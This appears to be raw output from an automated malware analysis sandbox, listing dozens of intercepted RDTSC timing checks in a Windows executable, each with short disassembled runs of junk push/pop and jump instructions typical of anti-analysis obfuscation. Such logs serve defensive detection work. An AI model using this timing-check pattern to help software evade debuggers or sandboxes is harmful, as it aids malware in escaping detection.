                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CEF25E second address: CEF265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CEF3A2 second address: CEF3A8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CEF3A8 second address: CEF3D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F2830CEE56Bh 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 push esi 0x00000013 pop esi 0x00000014 jnp 00007F2830CEE566h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d jnp 00007F2830CEE56Eh 0x00000023 push eax 0x00000024 pop eax 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CEF3D5 second address: CEF3D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CEF3D9 second address: CEF3DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CEF64F second address: CEF655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA20CE second address: CA20D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA20D3 second address: CA20DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F2830CF2D26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CEF7B8 second address: CEF837 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CEE572h 0x00000007 pushad 0x00000008 jmp 00007F2830CEE570h 0x0000000d jmp 00007F2830CEE573h 0x00000012 jmp 00007F2830CEE579h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F2830CEE575h 0x00000023 jmp 00007F2830CEE572h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CEF837 second address: CEF83B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CEF83B second address: CEF85B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F2830CEE566h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F2830CEE574h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CEF85B second address: CEF879 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2830CF2D2Ah 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2830CF2D30h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CEF879 second address: CEF87D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CF04A8 second address: CF04C1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2830CF2D31h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CF04C1 second address: CF04ED instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2830CEE566h 0x00000008 jnp 00007F2830CEE566h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F2830CEE579h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CF3E74 second address: CF3E7A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CF410D second address: CF412F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CEE574h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F2830CEE572h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CF412F second address: CF4135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CF4135 second address: CF4139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CF4139 second address: CF4146 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F2830CF2D26h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CF4146 second address: CF415E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2830CEE56Fh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CFA9CA second address: CFA9D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CFB48B second address: CFB490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CFB490 second address: CFB495 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CFB786 second address: CFB78F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CFB78F second address: CFB79A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F2830CF2D26h 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CFBA75 second address: CFBA9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F2830CEE578h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CFBA9B second address: CFBAB1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F2830CF2D31h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CFBDBC second address: CFBDC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CFBDC5 second address: CFBDC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C568B5 second address: C568C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D048BF second address: D048CA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D04A06 second address: D04A0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D04A0C second address: D04A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D04A12 second address: D04A41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CEE575h 0x00000007 jmp 00007F2830CEE573h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D0DFB2 second address: D0DFB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D0DFB8 second address: D0DFCB instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2830CEE566h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D0DFCB second address: D0DFD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D0DFD2 second address: D0DFE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push edx 0x00000006 pop edx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push ecx 0x0000000b jnp 00007F2830CEE566h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D0C088 second address: D0C0B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F2830CF2D38h 0x00000010 jnp 00007F2830CF2D28h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D0C519 second address: D0C537 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2830CEE578h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D0C537 second address: D0C568 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D30h 0x00000007 jmp 00007F2830CF2D31h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jnl 00007F2830CF2D26h 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D0C568 second address: D0C574 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jp 00007F2830CEE566h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D0C574 second address: D0C57C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D0C57C second address: D0C580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D0C580 second address: D0C5A0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2830CF2D26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2830CF2D32h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D0C6DC second address: D0C6F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a jnc 00007F2830CEE566h 0x00000010 pushad 0x00000011 popad 0x00000012 jnc 00007F2830CEE566h 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D0C6F5 second address: D0C6FA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D0C84E second address: D0C858 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2830CEE566h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D0CD81 second address: D0CDAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2830CF2D32h 0x0000000d pushad 0x0000000e js 00007F2830CF2D26h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 ja 00007F2830CF2D26h 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D0D713 second address: D0D71B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D0D71B second address: D0D731 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 jno 00007F2830CF2D26h 0x0000000d popad 0x0000000e jc 00007F2830CF2D2Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D1430A second address: D1431A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2830CEE566h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D1431A second address: D1435F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D38h 0x00000007 jmp 00007F2830CF2D37h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jmp 00007F2830CF2D2Dh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D15F08 second address: D15F1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CEE56Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D15F1A second address: D15F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D177D5 second address: D1783A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F2830CEE566h 0x0000000a jo 00007F2830CEE57Ah 0x00000010 jmp 00007F2830CEE574h 0x00000015 pop edi 0x00000016 pushad 0x00000017 jg 00007F2830CEE57Bh 0x0000001d ja 00007F2830CEE580h 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D1783A second address: D1783E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D24688 second address: D246A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F2830CEE578h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D246A7 second address: D246EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F2830CF2D3Ch 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007F2830CF2D34h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push esi 0x00000016 push eax 0x00000017 pop eax 0x00000018 pushad 0x00000019 popad 0x0000001a pop esi 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F2830CF2D31h 0x00000022 jng 00007F2830CF2D26h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D27C52 second address: D27C57 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D27C57 second address: D27C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2830CF2D2Ch 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2830CF2D35h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D322F4 second address: D322FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D322FA second address: D3230B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jp 00007F2830CF2D26h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D39C19 second address: D39C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D39C1F second address: D39C24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D39C24 second address: D39C38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CEE56Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D39C38 second address: D39C55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2830CF2D39h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D39A8F second address: D39A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D39A97 second address: D39A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D39A9C second address: D39AA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D3D6D5 second address: D3D6E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 js 00007F2830CF2D26h 0x0000000c popad 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D3D6E7 second address: D3D715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pushad 0x00000007 push edi 0x00000008 jmp 00007F2830CEE572h 0x0000000d pop edi 0x0000000e jmp 00007F2830CEE570h 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D41DDE second address: D41E0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D2Fh 0x00000007 pushad 0x00000008 jg 00007F2830CF2D26h 0x0000000e pushad 0x0000000f popad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jns 00007F2830CF2D26h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push edx 0x0000001c jne 00007F2830CF2D2Ch 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D41F37 second address: D41F3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D41F3C second address: D41F41 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D42FD4 second address: D42FDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D46F17 second address: D46F40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2830CF2D33h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d je 00007F2830CF2D28h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D46F40 second address: D46F44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D46C1A second address: D46C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D46C1E second address: D46C53 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2830CEE566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F2830CEE576h 0x00000010 jmp 00007F2830CEE573h 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D46C53 second address: D46C86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 jmp 00007F2830CF2D30h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007F2830CF2D37h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D4A8F1 second address: D4A8F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D57B53 second address: D57B57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D57B57 second address: D57B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F2830CEE56Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D5ABEF second address: D5ABF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D5ABF7 second address: D5AC26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F2830CEE576h 0x0000000c jmp 00007F2830CEE56Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D5AC26 second address: D5AC2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D67F9C second address: D67FA6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2830CEE572h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D67FA6 second address: D67FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F2830CF2D26h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
